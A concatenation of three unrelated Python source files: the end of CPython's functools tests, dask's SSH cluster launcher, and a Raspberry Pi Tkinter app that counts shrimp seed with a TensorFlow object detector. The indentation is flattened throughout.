with self.assertRaisesRegex(TypeError, "Invalid first argument to "):
f.register(list[int] | str, lambda arg: "types.UnionTypes(types.GenericAlias)")
with self.assertRaisesRegex(TypeError, "Invalid first argument to "):
f.register(typing.List[float] | bytes, lambda arg: "typing.Union[typing.GenericAlias]")
with self.assertRaisesRegex(TypeError, "Invalid first argument to "):
f.register(typing.Any, lambda arg: "typing.Any")
self.assertEqual(f([1]), "default")
self.assertEqual(f([1.0]), "default")
self.assertEqual(f(""), "default")
self.assertEqual(f(b""), "default")
def test_register_genericalias_decorator(self):
@functools.singledispatch
def f(arg):
return "default"
with self.assertRaisesRegex(TypeError, "Invalid first argument to "):
f.register(list[int])
with self.assertRaisesRegex(TypeError, "Invalid first argument to "):
f.register(typing.List[int])
with self.assertRaisesRegex(TypeError, "Invalid first argument to "):
f.register(list[int] | str)
with self.assertRaisesRegex(TypeError, "Invalid first argument to "):
f.register(typing.List[int] | str)
with self.assertRaisesRegex(TypeError, "Invalid first argument to "):
f.register(typing.Any)
def test_register_genericalias_annotation(self):
@functools.singledispatch
def f(arg):
return "default"
with self.assertRaisesRegex(TypeError, "Invalid annotation for 'arg'"):
@f.register
def _(arg: list[int]):
return "types.GenericAlias"
with self.assertRaisesRegex(TypeError, "Invalid annotation for 'arg'"):
@f.register
def _(arg: typing.List[float]):
return "typing.GenericAlias"
with self.assertRaisesRegex(TypeError, "Invalid annotation for 'arg'"):
@f.register
def _(arg: list[int] | str):
return "types.UnionType(types.GenericAlias)"
with self.assertRaisesRegex(TypeError, "Invalid annotation for 'arg'"):
@f.register
def _(arg: typing.List[float] | bytes):
return "typing.Union[typing.GenericAlias]"
with self.assertRaisesRegex(TypeError, "Invalid annotation for 'arg'"):
@f.register
def _(arg: typing.Any):
return "typing.Any"
self.assertEqual(f([1]), "default")
self.assertEqual(f([1.0]), "default")
self.assertEqual(f(""), "default")
self.assertEqual(f(b""), "default")
class CachedCostItem:
_cost = 1
def __init__(self):
self.lock = py_functools.RLock()
@py_functools.cached_property
def cost(self):
"""The cost of the item."""
with self.lock:
self._cost += 1
return self._cost
class OptionallyCachedCostItem:
_cost = 1
def get_cost(self):
"""The cost of the item."""
self._cost += 1
return self._cost
cached_cost = py_functools.cached_property(get_cost)
class CachedCostItemWait:
def __init__(self, event):
self._cost = 1
self.lock = py_functools.RLock()
self.event = event
@py_functools.cached_property
def cost(self):
self.event.wait(1)
with self.lock:
self._cost += 1
return self._cost
class CachedCostItemWithSlots:
__slots__ = ('_cost')
def __init__(self):
self._cost = 1
@py_functools.cached_property
def cost(self):
raise RuntimeError('never called, slots not supported')
class TestCachedProperty(unittest.TestCase):
def test_cached(self):
item = CachedCostItem()
self.assertEqual(item.cost, 2)
self.assertEqual(item.cost, 2) # not 3
def test_cached_attribute_name_differs_from_func_name(self):
item = OptionallyCachedCostItem()
self.assertEqual(item.get_cost(), 2)
self.assertEqual(item.cached_cost, 3)
self.assertEqual(item.get_cost(), 4)
self.assertEqual(item.cached_cost, 3)
def test_threaded(self):
go = threading.Event()
item = CachedCostItemWait(go)
num_threads = 3
orig_si = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
threads = [
threading.Thread(target=lambda: item.cost)
for k in range(num_threads)
]
with threading_helper.start_threads(threads):
go.set()
finally:
sys.setswitchinterval(orig_si)
self.assertEqual(item.cost, 2)
def test_object_with_slots(self):
item = CachedCostItemWithSlots()
with self.assertRaisesRegex(
TypeError,
"No '__dict__' attribute on 'CachedCostItemWithSlots' instance to cache 'cost' property.",
):
item.cost
def test_immutable_dict(self):
class MyMeta(type):
@py_functools.cached_property
def prop(self):
return True
class MyClass(metaclass=MyMeta):
pass
with self.assertRaisesRegex(
TypeError,
"The '__dict__' attribute on 'MyMeta' instance does not support item assignment for caching 'prop' property.",
):
MyClass.prop
def test_reuse_different_names(self):
"""Disallow this case because decorated function a would not be cached."""
with self.assertRaises(RuntimeError) as ctx:
class ReusedCachedProperty:
@py_functools.cached_property
def a(self):
pass
b = a
self.assertEqual(
str(ctx.exception.__context__),
str(TypeError("Cannot assign the same cached_property to two different names ('a' and 'b')."))
)
def test_reuse_same_name(self):
"""Reusing a cached_property on different classes under the same name is OK."""
counter = 0
@py_functools.cached_property
def _cp(_self):
nonlocal counter
counter += 1
return counter
class A:
cp = _cp
class B:
cp = _cp
a = A()
b = B()
self.assertEqual(a.cp, 1)
self.assertEqual(b.cp, 2)
self.assertEqual(a.cp, 1)
def test_set_name_not_called(self):
cp = py_functools.cached_property(lambda s: None)
class Foo:
pass
Foo.cp = cp
with self.assertRaisesRegex(
TypeError,
"Cannot use cached_property instance without calling __set_name__ on it.",
):
Foo().cp
def test_access_from_class(self):
self.assertIsInstance(CachedCostItem.cost, py_functools.cached_property)
def test_doc(self):
self.assertEqual(CachedCostItem.cost.__doc__, "The cost of the item.")
if __name__ == '__main__':
unittest.main()
|
ssh.py
|
from __future__ import print_function, division, absolute_import
import logging
import socket
import os
import sys
import time
import traceback
try:
from queue import Queue
except ImportError: # Python 2.7 fix
from Queue import Queue
from threading import Thread
from toolz import merge
from tornado import gen
logger = logging.getLogger(__name__)
# These are handy for creating colorful terminal output to enhance readability
# of the output generated by dask-ssh.
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def async_ssh(cmd_dict):
import paramiko
from paramiko.buffered_pipe import PipeTimeout
from paramiko.ssh_exception import (SSHException, PasswordRequiredException)
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
retries = 0
while True: # Be robust to transient SSH failures.
try:
# Set paramiko logging to WARN or higher to squelch INFO messages.
logging.getLogger('paramiko').setLevel(logging.WARN)
ssh.connect(hostname=cmd_dict['address'],
username=cmd_dict['ssh_username'],
port=cmd_dict['ssh_port'],
key_filename=cmd_dict['ssh_private_key'],
compress=True,
timeout=20,
banner_timeout=20) # Helps prevent timeouts when many concurrent ssh connections are opened.
# Connection successful, break out of while loop
break
except (SSHException,
PasswordRequiredException) as e:
print('[ dask-ssh ] : ' + bcolors.FAIL +
'SSH connection error when connecting to {addr}:{port}'
'to run \'{cmd}\''.format(addr=cmd_dict['address'],
port=cmd_dict['ssh_port'],
cmd=cmd_dict['cmd']) + bcolors.ENDC)
print(bcolors.FAIL + ' SSH reported this exception: ' + str(e) + bcolors.ENDC)
# Print an exception traceback
traceback.print_exc()
# Transient SSH errors can occur when many SSH connections are
# simultaneously opened to the same server. This makes a few
# attempts to retry.
retries += 1
if retries >= 3:
print('[ dask-ssh ] : '
+ bcolors.FAIL
+ 'SSH connection failed after 3 retries. Exiting.'
+ bcolors.ENDC)
# Connection failed after multiple attempts. Terminate this thread.
os._exit(1)
# Wait a moment before retrying
print(' ' + bcolors.FAIL +
'Retrying... (attempt {n}/{total})'.format(n=retries, total=3) +
bcolors.ENDC)
time.sleep(1)
# Execute the command, and grab file handles for stdout and stderr. Note
# that we run the command using the user's default shell, but force it to
# run in an interactive login shell, which hopefully ensures that all of the
# user's normal environment variables (via the dot files) have been loaded
# before the command is run. This should help to ensure that important
# aspects of the environment like PATH and PYTHONPATH are configured.
print('[ {label} ] : {cmd}'.format(label=cmd_dict['label'],
cmd=cmd_dict['cmd']))
stdin, stdout, stderr = ssh.exec_command('$SHELL -i -c \'' + cmd_dict['cmd'] + '\'', get_pty=True)
# Set up channel timeout (which we rely on below to make readline() non-blocking)
channel = stdout.channel
channel.settimeout(0.1)
def read_from_stdout():
"""
Read stdout stream, time out if necessary.
"""
try:
line = stdout.readline()
while len(line) > 0: # Loops until a timeout exception occurs
line = line.rstrip()
logger.debug('stdout from ssh channel: %s', line)
cmd_dict['output_queue'].put('[ {label} ] : {output}'.format(label=cmd_dict['label'],
output=line))
line = stdout.readline()
except (PipeTimeout, socket.timeout):
pass
def read_from_stderr():
"""
Read stderr stream, time out if necessary.
"""
try:
line = stderr.readline()
while len(line) > 0:
line = line.rstrip()
logger.debug('stderr from ssh channel: %s', line)
cmd_dict['output_queue'].put('[ {label} ] : '.format(label=cmd_dict['label']) +
bcolors.FAIL + '{output}'.format(output=line) + bcolors.ENDC)
line = stderr.readline()
except (PipeTimeout, socket.timeout):
pass
def communicate():
"""
Communicate a little bit, without blocking too long.
Return True if the command ended.
"""
read_from_stdout()
read_from_stderr()
# Check to see if the process has exited. If it has, we let this thread
# terminate.
if channel.exit_status_ready():
exit_status = channel.recv_exit_status()
cmd_dict['output_queue'].put('[ {label} ] : '.format(label=cmd_dict['label']) +
bcolors.FAIL +
"remote process exited with exit status " +
str(exit_status) + bcolors.ENDC)
return True
# Wait for a message on the input_queue. Any message received signals this
# thread to shut itself down.
while cmd_dict['input_queue'].empty():
# Kill some time so that this thread does not hog the CPU.
time.sleep(1.0)
if communicate():
break
# Ctrl-C the executing command and wait a bit for command to end cleanly
start = time.time()
while time.time() < start + 5.0:
channel.send(b'\x03') # Ctrl-C
if communicate():
break
time.sleep(1.0)
# Shutdown the channel, and close the SSH connection
channel.close()
ssh.close()
def start_scheduler(logdir, addr, port, ssh_username, ssh_port, ssh_private_key, remote_python=None):
cmd = '{python} -m distributed.cli.dask_scheduler --port {port}'.format(
python=remote_python or sys.executable, port=port, logdir=logdir)
# Optionally re-direct stdout and stderr to a logfile
if logdir is not None:
cmd = 'mkdir -p {logdir} && '.format(logdir=logdir) + cmd
cmd += '&> {logdir}/dask_scheduler_{addr}:{port}.log'.format(addr=addr,
port=port, logdir=logdir)
# Format output labels we can prepend to each line of output, and create
# a 'status' key to keep track of jobs that terminate prematurely.
label = (bcolors.BOLD +
'scheduler {addr}:{port}'.format(addr=addr, port=port) +
bcolors.ENDC)
# Create a command dictionary, which contains everything we need to run and
# interact with this command.
input_queue = Queue()
output_queue = Queue()
cmd_dict = {'cmd': cmd, 'label': label, 'address': addr, 'port': port,
'input_queue': input_queue, 'output_queue': output_queue,
'ssh_username': ssh_username, 'ssh_port': ssh_port,
'ssh_private_key': ssh_private_key}
# Start the thread
thread = Thread(target=async_ssh, args=[cmd_dict])
thread.daemon = True
thread.start()
return merge(cmd_dict, {'thread': thread})
def start_worker(logdir, scheduler_addr, scheduler_port, worker_addr, nthreads, nprocs,
ssh_username, ssh_port, ssh_private_key, nohost,
memory_limit,
worker_port,
nanny_port,
remote_python=None,
remote_dask_worker='distributed.cli.dask_worker'):
cmd = ('{python} -m {remote_dask_worker} '
'{scheduler_addr}:{scheduler_port} '
'--nthreads {nthreads}'
+ ('--nprocs {nprocs}' if nprocs != 1 else ''))
if not nohost:
cmd += ' --host {worker_addr} '
if memory_limit:
cmd += '--memory-limit {memory_limit} '
if worker_port:
cmd += '--worker-port {worker_port} '
if nanny_port:
cmd += '--nanny-port {nanny_port} '
cmd = cmd.format(
python=remote_python or sys.executable,
remote_dask_worker=remote_dask_worker,
scheduler_addr=scheduler_addr,
scheduler_port=scheduler_port,
worker_addr=worker_addr,
nthreads=nthreads,
nprocs=nprocs,
memory_limit=memory_limit,
worker_port=worker_port,
nanny_port=nanny_port)
# Optionally redirect stdout and stderr to a logfile
if logdir is not None:
cmd = 'mkdir -p {logdir} && '.format(logdir=logdir) + cmd
cmd += '&> {logdir}/dask_scheduler_{addr}.log'.format(
addr=worker_addr, logdir=logdir)
label = 'worker {addr}'.format(addr=worker_addr)
# Create a command dictionary, which contains everything we need to run and
# interact with this command.
input_queue = Queue()
output_queue = Queue()
cmd_dict = {'cmd': cmd, 'label': label, 'address': worker_addr,
'input_queue': input_queue, 'output_queue': output_queue,
'ssh_username': ssh_username, 'ssh_port': ssh_port,
'ssh_private_key': ssh_private_key}
# Start the thread
thread = Thread(target=async_ssh, args=[cmd_dict])
thread.daemon = True
thread.start()
return merge(cmd_dict, {'thread': thread})
class SSHCluster(object):
def __init__(self, scheduler_addr, scheduler_port, worker_addrs, nthreads=0, nprocs=1,
ssh_username=None, ssh_port=22, ssh_private_key=None,
nohost=False, logdir=None, remote_python=None,
memory_limit=None, worker_port=None, nanny_port=None,
remote_dask_worker='distributed.cli.dask_worker'):
self.scheduler_addr = scheduler_addr
self.scheduler_port = scheduler_port
self.nthreads = nthreads
self.nprocs = nprocs
self.ssh_username = ssh_username
self.ssh_port = ssh_port
self.ssh_private_key = ssh_private_key
self.nohost = nohost
self.remote_python = remote_python
self.memory_limit = memory_limit
self.worker_port = worker_port
self.nanny_port = nanny_port
self.remote_dask_worker = remote_dask_worker
# Generate a universal timestamp to use for log files
import datetime
if logdir is not None:
logdir = os.path.join(logdir, "dask-ssh_" + datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S"))
print(bcolors.WARNING + 'Output will be redirected to logfiles '
'stored locally on individual worker nodes under "{logdir}".'.format(logdir=logdir)
+ bcolors.ENDC)
self.logdir = logdir
# Keep track of all running threads
self.threads = []
# Start the scheduler node
self.scheduler = start_scheduler(logdir, scheduler_addr,
scheduler_port, ssh_username, ssh_port,
ssh_private_key, remote_python)
# Start worker nodes
self.workers = []
for i, addr in enumerate(worker_addrs):
self.add_worker(addr)
@gen.coroutine
def _start(self):
pass
@property
def scheduler_address(self):
return '%s:%d' % (self.scheduler_addr, self.scheduler_port)
def monitor_remote_processes(self):
# Form a list containing all processes, since we treat them equally from here on out.
all_processes = [self.scheduler] + self.workers
try:
while True:
for process in all_processes:
while not process['output_queue'].empty():
print(process['output_queue'].get())
# Kill some time and free up CPU before starting the next sweep
# through the processes.
time.sleep(0.1)
# end while true
except KeyboardInterrupt:
pass # Return execution to the calling process
def add_worker(self, address):
self.workers.append(start_worker(self.logdir, self.scheduler_addr,
self.scheduler_port, address,
self.nthreads, self.nprocs,
self.ssh_username, self.ssh_port,
self.ssh_private_key, self.nohost,
self.memory_limit,
self.worker_port,
self.nanny_port,
self.remote_python,
self.remote_dask_worker))
def shutdown(self):
all_processes = [self.scheduler] + self.workers
for process in all_processes:
process['input_queue'].put('shutdown')
process['thread'].join()
def __enter__(self):
return self
def __exit__(self, *args):
self.shutdown()
|
mainV2.py
|
import tkinter as tk
from tkinter import *
from tkinter import ttk
import tkinter.font as tkFont
from tkinter import messagebox
import numpy as np
import cv2
from PIL import Image, ImageTk
import threading
from datetime import datetime
import subprocess
import os
import time
import RPi.GPIO as GPIO
import tensorflow as tf
from object_detection.utils import label_map_util
import serial
ser = serial.Serial ("/dev/ttyS0",
baudrate = 38400,
parity = serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout = 1)
GPIO.setmode(GPIO.BCM)
#The GPIO.BCM option means that we are referring to the pins by the “Broadcom SOC channel” number, these are the numbers after “GPIO”
GPIO.setwarnings(False)
#We use this line of code to avoid warning messages because we don’t end the GPIO connection properly while interrupting the program
#DEFINE GPIO Relay Pins
relay = 21
relayState = False
GPIO.setup(relay, GPIO.OUT)
GPIO.output(relay, relayState)
# make white color Backlight as default
light_default = ["@255$\n", "#255$\n", "&255$\n"]
for send in light_default:
print(send)
ser.write(send.encode())
# ------------------------------------------------------------------------------------------
# ------------------------------------------- detector class -------------------------------
class DetectorTF2:
def __init__(self, path_to_checkpoint, path_to_labelmap, class_id=None, threshold=0.5):
# class_id is list of ids for desired classes, or None for all classes in the labelmap
self.class_id = class_id
self.Threshold = threshold
# Loading label map
label_map = label_map_util.load_labelmap(path_to_labelmap)
categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=90, use_display_name=True)
self.category_index = label_map_util.create_category_index(categories)
tf.keras.backend.clear_session()
self.detect_fn = tf.saved_model.load(path_to_checkpoint)
def DetectFromImage(self, img):
im_height, im_width, _ = img.shape
# Expand dimensions since the model expects images to have shape: [1, None, None, 3]
input_tensor = np.expand_dims(img, 0)
detections = self.detect_fn(input_tensor)
bboxes = detections['detection_boxes'][0].numpy()
bclasses = detections['detection_classes'][0].numpy().astype(np.int32)
bscores = detections['detection_scores'][0].numpy()
det_boxes = self.ExtractBBoxes(bboxes, bclasses, bscores, im_width, im_height)
return det_boxes
def ExtractBBoxes(self, bboxes, bclasses, bscores, im_width, im_height):
bbox = []
for idx in range(len(bboxes)):
if self.class_id is None or bclasses[idx] in self.class_id:
if bscores[idx] >= self.Threshold:
y_min = int(bboxes[idx][0] * im_height)
x_min = int(bboxes[idx][1] * im_width)
y_max = int(bboxes[idx][2] * im_height)
x_max = int(bboxes[idx][3] * im_width)
class_label = self.category_index[int(bclasses[idx])]['name']
bbox.append([x_min, y_min, x_max, y_max, class_label, float(bscores[idx])])
return bbox
def DisplayDetections(self, image, boxes_list, det_time=None):
if not boxes_list: return image # input list is empty
img = image.copy()
for idx in range(len(boxes_list)):
x_min = boxes_list[idx][0]
y_min = boxes_list[idx][1]
x_max = boxes_list[idx][2]
y_max = boxes_list[idx][3]
cls = str(boxes_list[idx][4])
score = str(np.round(boxes_list[idx][-1], 2))
text = cls + ": " + score
cv2.rectangle(img, (x_min, y_min), (x_max, y_max), (0, 255, 0), 1)
cv2.rectangle(img, (x_min, y_min - 20), (x_min, y_min), (255, 255, 255), -1)
# cv2.putText(img, text, (x_min + 5, y_min - 7), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 1)
if det_time != None:
fps = round(1000. / det_time, 1)
fps_txt = str(fps) + " FPS"
cv2.putText(img, fps_txt, (25, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 0, 0), 2)
return img
# ------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------
# ------------------------------------------- tensor program -------------------------------
contrastValue = 30 #in precentages
# input frame from camera
def inputCam(source):
check = 0
cam = source
#if not cam.isOpened():
# messagebox.showerror("Error !", "Kamera tidak terhubung ! Harap memeriksa koneksi kamera ...")
# raise Exception("Could not open video device")
# return 0
cam.set(cv2.CAP_PROP_FRAME_WIDTH, 1920)
cam.set(cv2.CAP_PROP_FRAME_HEIGHT, 1080)
#cam.set(cv2.CAP_PROP_AUTOFOCUS, 0)
ret, frame = cam.read()
#if ret == True:
# check = checkBacklight(frame)
# if(check < 16000):
# messagebox.showerror("Error !", "Backlight tidak menyala ! Harap memeriksa sambungan backlight ...")
# cam.release()
# return 0
return frame
# For preprocessing image
def make_image_square(filename):
img = cv2.imread(filename)
# Size of the image
#s = 640
# Creating a dark square with NUMPY
#f = np.zeros((s, s, 3), np.uint8)
# Getting the centering position
#ax, ay = (s - img.shape[1])//2, (s - img.shape[0])//2
# Pasting the 'image' in a centering position
#f[ay:img.shape[0]+ay, ax:ax+img.shape[1]] = img
#resize to 640x640
f = cv2.resize(img, (640,640), interpolation = cv2.INTER_AREA)
cv2.imwrite(filename, f)
def increaseContrast(img, precentage):
start = time.perf_counter()
image = img
contrast = precentage / 100
image = cv2.addWeighted(image, 1, image, contrast, 0)
stop = time.perf_counter()
print("finished adding contrast in " + str(round(stop-start, 2)) + " seconds")
return image
def crop_image():
for image_index in range(2):
folder_name = 'data/'
image_name = folder_name + str(image_index + 1) + '.jpg'
# ---------------- using simulation image -------------------
img = cv2.imread(image_name)
img = img[74:954,517:1397,:]
# ---------------- using video input -------------------
#img = inputCam(cv2.VideoCapture(0))
#cv2.imwrite(image_name, img)
h, w, c = img.shape
w_constant = w/2
h_constant = h/2
image_part_index = 0
for index_w in range(2):
for index_h in range(2):
start_width = int(w_constant * index_w)
end_width = int(w_constant * (index_w + 1))
start_height = int(h_constant * index_h)
end_height = int(h_constant * (index_h + 1))
current_index = image_part_index
# For training image set
# section_name = 'PL_8_' + str(image_index+1) + '_'
# file_name = section_name + str(image_index+1) + '_' + str(image_part_index) + '.jpg'
# For testing image set
section_name = str(image_index+1) + '/'
file_name = folder_name + section_name + \
str(image_part_index+1) + '.jpg'
crop_img = img[start_height:end_height, start_width:end_width]
crop_img = increaseContrast(crop_img, contrastValue)
image_part_index = image_part_index + 1
cv2.imwrite(file_name, crop_img)
make_image_square(file_name)
# For detection
def WriteFile(output_dir, file_name, content):
file_output = os.path.join(output_dir, file_name)
f = open(file_output, 'a+')
f.write(content)
f.close()
models = ['faster-rcnn-resnet50-18000']
threshold_setup = [0.3]
test_images_folders = ['1', '2']
# For detection
def DetectImagesFromFolder(detector, images_dir, save_output=False, output_dir='output/'):
total_detected = 0
timestamp2 = time.time()
for file in os.scandir(images_dir):
if file.is_file() and file.name.endswith(('.jpg', '.jpeg', '.png')) :
image_path = os.path.join(images_dir, file.name)
img = cv2.imread(image_path)
timestamp1 = time.time()
det_boxes = detector.DetectFromImage(img)
elapsed_time = round((time.time() - timestamp1) * 1000) #ms
img = detector.DisplayDetections(img, det_boxes)
total_detected = total_detected + len(det_boxes)
text_to_save = str(file.name) + ':\t' + str(len(det_boxes)) + ' benur detected' + '\t' + '[' + str(elapsed_time/1000) + ' s] \t\n'
if save_output:
img_out = os.path.join(output_dir, file.name)
cv2.imwrite(img_out, img)
WriteFile(output_dir, 'ResultLog.txt', text_to_save)
elapsed_time2 = round((time.time() - timestamp2) * 1000) #ms
now = datetime.now()
dt_string = now.strftime("%B %d, %Y %H:%M:%S")
final_text_to_save = dt_string + ' with ' + str(contrastValue) + '% preprocessing contrast ' + ' = ' + str(total_detected) + 'benur detected\t' + '[' + str(elapsed_time2/1000) + ' s] \n\n'
if save_output:
WriteFile(output_dir, 'Final.txt', final_text_to_save)
return total_detected
# For detection
def execute_tf(model_path, threshold, output_directory, labelmap_path, images_dir, id_list_data = None):
id_list = id_list_data
if id_list_data is not None:
id_list = [int(item) for item in id_list_data.split(',')]
save_output = True
if save_output:
if not os.path.exists(output_directory):
os.makedirs(output_directory)
# instance of the class DetectorTF2
detector = DetectorTF2(model_path, labelmap_path,
class_id=id_list, threshold=threshold)
result = DetectImagesFromFolder(
detector, images_dir, save_output=True, output_dir=output_directory)
return result
# For detection
def detect_images():
detected_total = np.array([])
for threshold in threshold_setup:
# Generate string for threshold output folder
threshold_str = str(threshold)
threshold_str = threshold_str.replace('.', '_')
for folder in test_images_folders:
# Generate string for output folder
folder_subname = folder.replace('/', '_')
for model in models:
# Generate output directory
output_directory = 'output_' + folder_subname + '_' + threshold_str
detection_model_path = 'models/' + model
detection_labelmap_path = 'models/Shrimp-seed-object_label_map.pbtxt'
detection_images_dir = 'data/' + folder
detection_output_dir = 'data/' + output_directory + '/' + model
detection_result = execute_tf(detection_model_path, threshold, detection_output_dir, detection_labelmap_path, detection_images_dir)
detected_total = np.append(detected_total, int(detection_result))
result = np.sort(detected_total)[::-1]
return int(result[0])
def calculate():
#=========== Detection Program here ========#
crop_image()
#=========== Should return the result ======#
detected_result = detect_images()
return detected_result
# ------------------------------------------------------------------------------------------
# additional function
def checkBacklight(frame):
# backlight check wether the led is on or not, light intensity threshold - 50 per pixel
check = 0
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
for row in range(118, 138):
for column in range(118, 138):
check += gray[row][column]
return check
# ------------------------------------------------------------------------------------------
# --------------------------------------------- GUI Section --------------------------------
white = "#ffffff"
BlackSolid = "#000000"
font = "Constantia"
fontButtons = (font, 12)
maxWidth = 1024
maxHeight = 768
colorChoice = {'putih' : '$255,255,255$\n',
'kuning' : '$255,255,0$\n',
'hijau' : '$0,255,0$\n',
'biru' : '$0,255,255$\n',
'merah' : '$255,0,0$\n'}
def _from_rgb(rgb):
"""translate an rgb tuple to hex"""
return "#%02x%02x%02x" % rgb
class buttonL:
def __init__(self, obj, size, position, text,font, fontSize, hoverColor,command=None):
self.obj= obj
self.size= size
self.position= position
self.font= font
self.fontSize= fontSize
self.hoverColor= hoverColor
self.text= text
self.command = command
self.state = True
self.Button_ = None
def myfunc(self):
print("Hello size :" , self.size)
print("Hello position :" , self.position)
print("Hello font :" , self.font)
print("Hello fontSize :" , self.fontSize)
print("Hello hoverState :" , self.hoverColor)
def changeOnHover(self, obj,colorOnHover, colorOnLeave):
obj.bind("<Enter>", func=lambda e: obj.config(
background=colorOnHover))
obj.bind("<Leave>", func=lambda e: obj.config(
background=colorOnLeave))
def buttonShow(self):
fontStyle = tkFont.Font(family= self.font, size=self.fontSize,weight="bold")
self.Button_ = Button(self.obj,text = self.text, font=fontStyle, width = self.size[0], height = self.size[1], bg = self.hoverColor[1] if isinstance(self.hoverColor, list) == True else self.hoverColor, compound=TOP,command=self.command)
self.Button_.place(x=self.position[0],y=self.position[1])
if isinstance(self.hoverColor, list) == True:
self.changeOnHover(self.Button_, self.hoverColor[0], self.hoverColor[1])
else:
self.changeOnHover(self.Button_, self.hoverColor, self.hoverColor)
def stateButton(self,st):
self.st=st
if not self.Button_ == None:
self.Button_["state"]=self.st
def buttonUpdate(self, textUpdate = "", colorUpdate = "#fff"):
temp= [self.hoverColor[0], colorUpdate]
self.hoverColor = temp
self.Button_.config(text = textUpdate, bg = self.hoverColor[1] if isinstance(self.hoverColor, list) == True else self.hoverColor)
if isinstance(self.hoverColor, list) == True:
self.changeOnHover(self.Button_, self.hoverColor[0], self.hoverColor[1])
else:
self.changeOnHover(self.Button_, self.hoverColor, self.hoverColor)
class buttonImg:
def __init__(self, obj, imgDir, size, position, hoverColor, command=None):
self.obj= obj
self.imgDir= imgDir
self.size= size
self.position= position
self.hoverColor = hoverColor
self.command = command
self.state = True
self.Button_ = None
def changeOnHover(self, obj,colorOnHover, colorOnLeave):
obj.bind("<Enter>", func=lambda e: obj.config(
background=colorOnHover))
obj.bind("<Leave>", func=lambda e: obj.config(
background=colorOnLeave))
def buttonShow(self):
self.Button_ = Button(self.obj, width = self.size[0], height = self.size[1], bg = self.hoverColor[1] if isinstance(self.hoverColor, list) == True else self.hoverColor, bd = 10, highlightthickness=4, highlightcolor="#000", highlightbackground="#000", borderwidth = 4, compound=TOP, command=self.command)
self.Button_.place(x=self.position[0],y=self.position[1])
self.imageOpen = Image.open(self.imgDir)
self.imageOpen = self.imageOpen.resize((self.size[0],self.size[1]), Image.ANTIALIAS)
self.imageOpen = ImageTk.PhotoImage(self.imageOpen)
self.Button_.config(image=self.imageOpen)
if isinstance(self.hoverColor, list) == True:
self.changeOnHover(self.Button_, self.hoverColor[0], self.hoverColor[1])
else:
self.changeOnHover(self.Button_, self.hoverColor, self.hoverColor)
def stateButton(self,st):
self.st=st
if not self.Button_ == None:
self.Button_["state"]=self.st
def buttonUpdate(self, colorUpdate = "#fff"):
temp= [self.hoverColor[0], colorUpdate]
self.hoverColor = temp
self.Button_.config(bg = self.hoverColor[1] if isinstance(self.hoverColor, list) == True else self.hoverColor)
if isinstance(self.hoverColor, list) == True:
self.changeOnHover(self.Button_, self.hoverColor[0], self.hoverColor[1])
else:
self.changeOnHover(self.Button_, self.hoverColor, self.hoverColor)
class sliderLabel:
def __init__(self, obj, labelText, bgColor, labelPosition, labelFont, labelFontSize):
fontStyleLabel= tkFont.Font(family=labelFont, size=labelFontSize, weight = "bold")
redLabel = Label(obj, text=labelText, bg=bgColor, fg="#fff", font=fontStyleLabel)
redLabel.pack()
redLabel.place(x=labelPosition[0],y=labelPosition[1])
class logo:
def __init__(self, obj, imgDir, size, position, bg, command=None):
self.obj= obj
self.imgDir= imgDir
self.size= size
self.position= position
self.bg = bg
self.command = command
self.state = True
self.Button_ = None
def show(self):
self.logo = Button(self.obj, width = self.size[0], height = self.size[1], bg = self.bg, borderwidth = 0)
self.logo.place(x=self.position[0],y=self.position[1])
self.img = Image.open(self.imgDir)
self.img = self.img.resize((self.size[0],self.size[1]), Image.ANTIALIAS)
self.img = ImageTk.PhotoImage(self.img)
self.logo.config(image = self.img)
class framecontroller(tk.Tk):
def __init__(self, *args, **kwargs):
tk.Tk.__init__(self, *args, **kwargs)
#Graphics window
self.mainWindow = self
self.mainWindow.configure(bg=BlackSolid)
self.mainWindow.geometry('%dx%d+%d+%d' % (maxWidth,maxHeight,0,0))
self.mainWindow.resizable(0,0)
self.mainWindow.title("SHRICO")
self.mainWindow.attributes("-fullscreen", True)
# # creating a container
container = tk.Frame(self.mainWindow)
container.configure(bg=BlackSolid)
container.pack(side = "top", fill = "both", expand = True)
container.grid_rowconfigure(0, weight = 1)
container.grid_columnconfigure(0, weight = 1)
self.frames = {}
for F in (StartPage,Page1):
frame = F(container, self.mainWindow)
self.frames[F] = frame
frame.grid(row = 0, column = 0, sticky ="nsew")
self.show_frame(StartPage)
def show_frame(self, cont):
frame = self.frames[cont]
frame.tkraise()
class StartPage(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self, parent)
self.relayState = False
self.relay = relay
self.ratarata=0
# backgroud
self.bg = Button(self, width = 1024, height = 768, fg = '#000', bg = '#000', borderwidth = 0)
self.bg.place(x=-2,y=0)
self.imageOpen = ImageTk.PhotoImage(Image.open('icon/tambak.jpg'))
self.bg.config(image=self.imageOpen)
# canvas
self.canvas = logo(self, 'icon/back.png', [975, 520], [20,70], bg = '#fff')
self.canvas.show()
# contain
fontStyleLabel= tkFont.Font(family="Arial", size=80)
self.label1 = Label(self, text="Jumlah Benih", bg='#c9e4e9', fg='#08272b', font=fontStyleLabel)
self.label1.pack()
self.label1.place(x=210,y=130)
self.shrico = logo(self, 'icon/logo.png', [220, 60], [0,0], bg = '#d4e4e8')
self.shrico.show()
self.pens = logo(self, 'icon/pens.png', [65, 55], [932,0], bg = '#d4e4e8')
self.pens.show()
self.sky = logo(self, 'icon/penssky.png', [215, 55], [714,0], bg = '#d4e4e8')
self.sky.show()
fontStyleLabel= tkFont.Font(family="Arial", size=180)
self.label2 = Label(self, text=" 0", bg='#c9e4e9', fg='#08272b', font=fontStyleLabel)
self.label2.pack()
self.label2.place(x=210,y=250)
fontStyle = tkFont.Font(family= "Arial", size=40,weight="bold")
self.button1 = buttonL(self,[15,2],[20,690],"Kalibrasi",fontStyle,15,["yellow",'#ddd'],lambda : [controller.show_frame(Page1)])
